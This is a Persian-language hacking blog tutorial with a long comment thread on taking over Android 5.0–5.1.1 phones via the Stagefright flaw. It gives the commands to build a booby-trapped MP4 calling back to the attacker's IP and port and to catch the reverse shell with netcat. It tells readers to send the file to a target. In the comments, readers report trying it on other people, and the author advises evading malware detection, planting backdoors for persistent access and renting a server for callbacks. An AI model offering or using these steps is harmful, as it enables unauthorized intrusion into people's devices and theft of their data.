نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

نفوذ به اندروید

اموزش نفوذ به اندروید فقط با ارسال یک ویدیو (فرمت MP4) و با استفاده از اسیب پذیری Stagefright با ما در ادامه این اموزش هک و امنیت همراه باشید

نفوذ به اندروید با ارسال ویدیو و امنیت

سیستم عامل اندروید یکی از بهترین و محبوب ترین سیستم عامل های موبایل در جهان است به همین دلیل متخصصان امنیتی زیادی
بر روی امنیت اندروید کار میکنند اما اسیب پذیری هایی وجود دارند که بعد از انتشار اخرین نسخه منتشر میشوند تا هر چه سریع تر نسبت به رفع ان اقدام شود
بسیاری بعد از تهیه دستگاه اندرویدی خود اقدام به اپدیت و رفع این اسیب پذیری ها نمیکنند
یا شرکت های تولید کننده اپدیتی برای دستگاه قدیمی یا جدید ارائه نمیدهند 
پس اسیب پذیری در بسیاری از دستگاه ها باقی میمانند و هکرا با استفاده از ان حفره های امنیتی اقدام به نفوذ میکنند
یکی از این اسیب پذیری های خطرناک به نام Stagefright است که نفوذگر میتواند با ارسال یک ویدیو به کاربر دسترسی کنترل از راه ذور بگیرد 
که در ادامه با نحوه استفاده با این حفذره امنیتی اشنا میشوید
 

اسیب پذیری Stagefright

Stagefright یک حفره امنیتی در سیستم عامل اندرید از نوع باگ RCE است 
که همانطور که گفته شد با اجرای یک فایل ویدیو ای با پسورند .mp4 دسترسی کنترل از راه دور به نفوذگر میدهد
اکسپلویت این اسیب پذیری به صورت عمومی منتشر شده است و میتواند اندروید 5.0 < 5.1.1 را مورد نفوذ قرار دهد
میتوانید فایل اکسپلویت را از اخر اموزش به صورت مستقیم دانلود کنید یا از سایت exploit-db.com دریافت کنید
نکته : در این اموزش برای نفوذ به اندروید از لینوکس استفاده میکنیم اما میتوانید با نصب پایتون در هر سیستم عاملی مانند ویندوز استفاده کنید
وارد ترمینال شوید و به مسیری که فایل پایتون اکسپلویت را قرار داده اید بروید
حال اکسپلویت را اجرا کنید تا سویچ ها و راهنمای ان را ببینید

python 38124.py

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

ساخت فایل الوده MP4

حال برای ساخت فایل ویدیو ای الوده به دستور زیر توجه کنید

python 38124.py -c 127.0.0.1 -p 6060 -o PentestCore.mp4

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو


با استفاده از python فایل اکسپلویت 38124.py را اجرا کرده ایم 
با سویچ -c ادرس ip سرور خود که میخواهید اتصال دستگاه کلاینت به ان برقرار شود را وارد کنید
یک پورت شبکه را برای اتصال به دلخواه انتخاب کنید ما با استفاده از سویچ -p پورت 6060 را انتخاب کرده ایم
و برای گرفتن خروجی سویچ -o را وارد کنید و سپس نام فایل را با فرمت .mp4 وارد کنید
که ما PentestCore.mp4 وارد کرده ایم این فایل خروجی است که باید به کلاینت خود بدهید تا اجرا کنید
بعد از اجرا فایل ساخته شده توسط کاربر نفوذ به اندروید انجام شده و اتصال به سرور شما بر قرار میشود 
برای برقراری این اتصال باید پورت 6060 را که انتخاب کرده بودید در سرور خود باز کنید و منتظر اجرای ویدیو توسط کلاینت شوید 
NC ابزاری مناسب برای باز کردن پورت است که در کالی لینوکس به صورت پیشفرض وجود دارد 
میتوانید اموزش استفاده از نت کت (nc) را در PentestCore مشاهده کنید
در nc را با سویچ های زیر اجرا کنید تا پروت مورد نظر شما بر روی سیسستم باز شود

nc -v -l -p 6060

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو


بعد از اجرای فایل ویدو ای دستگاه به صورت ریموت به سرور شما از طریق nc متصل میشود و میتوانید دستورات خود را بر روی دستگاه وارد کنید
 

آموزش ویدیو ای

دریافت لینک دانلود



[ برای دریافت فایل وارد شوید و یا ثبت نام کنید! ]

پسورد : pentestcore.com

امیدواریم از این اموزش نفوذ به اندروید لذت برده باشید
موفق باشید. 

4/5 (3 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

۳۶ دیدگاه در “نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو”

  • سینا نادری اسفند ۲۵, ۱۳۹۷ پاسخ

    سلام یه سوال داشتم در رابطه با رات های اندرویدی
    آیا راهی هست که گوشی نتونه رات رو شناسایی کنه چون هنگام نصب رات مثل اسپای نوت گوشی پیغام میده که برنامه مخربه و به دستگاه آسیب میزنه

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود
      بله راه هایی وجود دارد که باید برنامه نویسی بلد باشید و تغیراتی در کد نویسی فایل دهید

  • milani97 اسفند ۲۷, ۱۳۹۷ پاسخ

    سلام من مراحل بالا رو به ترتیب انجام دادم ولی وقتی دستور sudo python 38124.py رو اجرا میکنم خطای زیر رو نشون میده
    با ابونتو البته تست کردم
    File “38124.py”, line 8
    SyntaxError: Non-ASCII character ‘\xe2’ in file 38124.py on line 8, but no encoding declared; see python. org/dev/peps/pep-0263/ for details

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود
      فایل را به صورت مستقیم از PentestCore دریافت کنید و نام ان را به mp4.py تغیر بدین مشکل حل میشود
      اموزش ویدیو ای را حتما مشاهده کنید تمام این نکات گفته شده
      موفق باشید

  • rootkali52 اسفند ۲۷, ۱۳۹۷ پاسخ

    سلام خسته نباشید.. همون چیزایی که گفتید انجام دادم ولی کار نکرد.. برا طرفم فرستادم

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود تشکر از شما
      احتمالا دستگاه اندرویدی طرف مقابل شما از اندروید ۵ استفاده نمیکند داخل اموزش گفته شده دقیقا چه نسخه هایی از اندروید این اسیب پذیری را دارند
      و یا احتمالا مشکل ip دارید باید از سرور مجازی استفاده کنید یا پورت فورواردیتگ انجام دهید

  • 563694 اردیبهشت ۳, ۱۳۹۸ پاسخ

    سلام اموزش رو نمیشه با تروموکس انجام داد؟

    • Nima Nani اردیبهشت ۵, ۱۳۹۸ پاسخ

      درود
      اگر مشکل اتصال نداشته باشید میتوانید داخل ترموکس هم انجام دهید

  • علی اردیبهشت ۵, ۱۳۹۸ پاسخ

    این برای لینوکسه توی تروموکس نمیشه ازش استفاده کرد؟؟؟؟

    • Nima Nani اردیبهشت ۵, ۱۳۹۸ پاسخ

      درود
      اگر مشکل شبکه و اتصال نداشته باشید میتوانید در ترموکس هم انجام دهید

  • 563694 اردیبهشت ۸, ۱۳۹۸ پاسخ

    سلام داداش منظورت از (مشکل شبکه و اتصال نداشته باشید) چیه؟ برای استفاده در تروموکس؟

    • Nima Nani اردیبهشت ۱۲, ۱۳۹۸ پاسخ

      درود
      شما باید ای پی ثابت داشته باشید و شبکه شما به صورت bridge باشد که در دستگاه های خانگی به این صورت نمیباشد

  • Root خرداد ۲۰, ۱۳۹۸ پاسخ

    سلام و خسته نباشید میخواستم بدونم کد کی بخوام از داخل گوشی اون کسی که هک شده بکشم بیرون چجوری باید تو لینوکس وارد کنم ممنون میشم جوابم را بدید

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      بعد از دسترسی میتوانید بکدور خود را بریزید و دسترسی کامل بگیرید. منظورتون از کد خیلی ناواضح است

  • علی تیر ۱۵, ۱۳۹۸ پاسخ

    سلام ببخشید چطور میشه اتصال رو بعد از خاموش کردن کالی حفظ کرد

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      میتوانید برای اتصال دائم یک بکدور بر روی دستگاه بگذارید تا بتوانید به صورتی که میخواهید با هر سیستمی متصل شوید

  • mohammad تیر ۳۰, ۱۳۹۸ پاسخ

    سلام خسته نباشید .
    میشه ازتون خواهش کنم که آموزش کامل مرحله به مرحله تا زمانیکه اتصال دائم میگیرید رو اموزش بدید.مبحث پورت فورواردینگ و بکدور خیلی مهمه
    ایا میشه از Ngrok برای پورت فورواردینگ استفاده کرد و اینکه اگه میشه از کدوم حالت http یاtcp
    واینکه این باگ هنوزم کار میکنه حتی اگه نسخه اندروید ۵ یا ۵.۱ باشه

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود تشکر
      بله در صورت امکان این اموزش را قرار خواهیم داد
      بله این باگ در نسخه های پچ نشده اندروید ۵ و ۵.۱ همچنان کار میکند

  • omid99924 بهمن ۱۸, ۱۳۹۸ پاسخ

    سلام مهندس برای آموزش بالا سرور از کجا گیر بیاریم

    • نیما حسینی بهمن ۱۸, ۱۳۹۸ پاسخ

      درود می توانید از وب سایت اول سرور ، سرور مجازی تهیه کنید :
      AvalServer.com

  • kolak اسفند ۲۲, ۱۳۹۸ پاسخ

    رمز فایل چنده؟

    • نیما حسینی اسفند ۲۹, ۱۳۹۸ پاسخ

      درود
      پسورد فایل : pentestcore.com

  • شفیع فروردین ۱۹, ۱۳۹۹ پاسخ

    سلام بعد مرحله nc وقت که c را وارد میکنم forward host lookup fild:unknown host نوشته میشه

    • نیما حسینی فروردین ۲۳, ۱۳۹۹ پاسخ

      درود
      داخل سرور مجازی این کار را انجام دهید تا اتصال شما به صورت Bridge باشد.

  • Mobinfff6565 اردیبهشت ۲۵, ۱۳۹۹ پاسخ

    با سلام و عرض خسته نباشید من یک سوال داشتم توی ترموکس تمام مراحلو میرم ولی وقتی کد
    nc -v -l -p 6060
    را که وارد میکنم خودم میزنم رو فایل mp4 و میام توی ترموکس ترموکس هیچ تغییری نمیکنه و همون نوشته listening on [any] 6060 هستش من الان چیکار کنم این درست بشه؟

    • نیما حسینی اردیبهشت ۳۰, ۱۳۹۹ پاسخ

      درود
      احتمالا دستگاه شما اسیب پذیر نیست ، باید بر روی دستگاه اسیب پذیر تست کنید.

  • Mobinfff اردیبهشت ۲۷, ۱۳۹۹ پاسخ

    سلام خسته نباشید من قسمت اخر مشکل دارم وقتی میزنم رو فایل mp4 هیچی برام تو ترموکس نمیاد و دوم اینکه روشی هست که بشه با ای پی یا شماره تلفن هک کرد؟
    با تشکر از سایت خوبتون

    • نیما حسینی اردیبهشت ۳۰, ۱۳۹۹ پاسخ

      درود تشکر
      دستگاه باید اسیب پذیر باشد تا این روش عمل کند.
      بله ، اموزش های مختلفی در این زمینه ها داخل سایت قرار دارد که با کمی جستجو می توانید ان ها را مشاهده کنید ، در صورتی که پیدا نکردید بفرمایید تا لینک ارسال شود.

  • nAhmad خرداد ۱۱, ۱۳۹۹ پاسخ

    درود
    مهندس خسته نباشید

    میشه که کاری کرد که از نسخه های پایین تر و بالاتر اندروید هم دسترسی گرفت مثلاً با خاموش کردن سپر امنیتی گوگل پلی ممنون میشم

    ممنون از سایت خوبتون موفق باشید 🌹

    • نیما حسینی خرداد ۱۶, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      خیر متاسفانه این روش فقط بر روی نسخه های اسیب پذیر جواب می دهد.

  • s.javan2005 شهریور ۱۴, ۱۳۹۹ پاسخ

    سلام
    میشه لینک آموزش نفوذ با شماره تماس رو بدید
    من نتونستم اونو پیداش کنم

    • نیما حسینی شهریور ۱۵, ۱۳۹۹ پاسخ

      درود
      اموزشی با این عنوان داخل سایت نداریم.

  • دهقانی آبان ۳۰, ۱۳۹۹ پاسخ

    این برنامه سیستم ما رو تخریب نمیکنه
    بعد تمام اطلاعات گوشی برای ما قابل دسترسی هست

    • نیما حسینی آذر ۷, ۱۳۹۹ پاسخ

      درود
      خیر اما در محیط مجازی ساز استفاده کنید اگر خیلی حساس هستید
      مورد دوم هم بله تا حدودی.

  • سبحان آذر ۱۹, ۱۳۹۹ پاسخ

    سلام خسته نباشید
    می‌خواستم بدونم وقتی این فیلم الوده توسط فرد باز میشه ایا اجرا و قابل پخش است یا خیر
    و اینکه روشی هست که فیلم الوده ای ساخت که به اندروید ۴.۴.٢ نفوذ کند?
    ممنون میشم پاسخ بدین…

    • نیما حسینی آذر ۲۱, ۱۳۹۹ پاسخ

      درود و تشکر
      این آسیب‌پذیری فقط در نسخه های گفته شده قابل استفاده است برای استفاده در نسخه های دیگر باید آسیب پذیری های دیگری پیدا شود.
      فایل آلوده قابل پخش نخواهد بود.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
کالی لینوکس
دوره های آموزشی
نماد اعتماد
همکاری با ما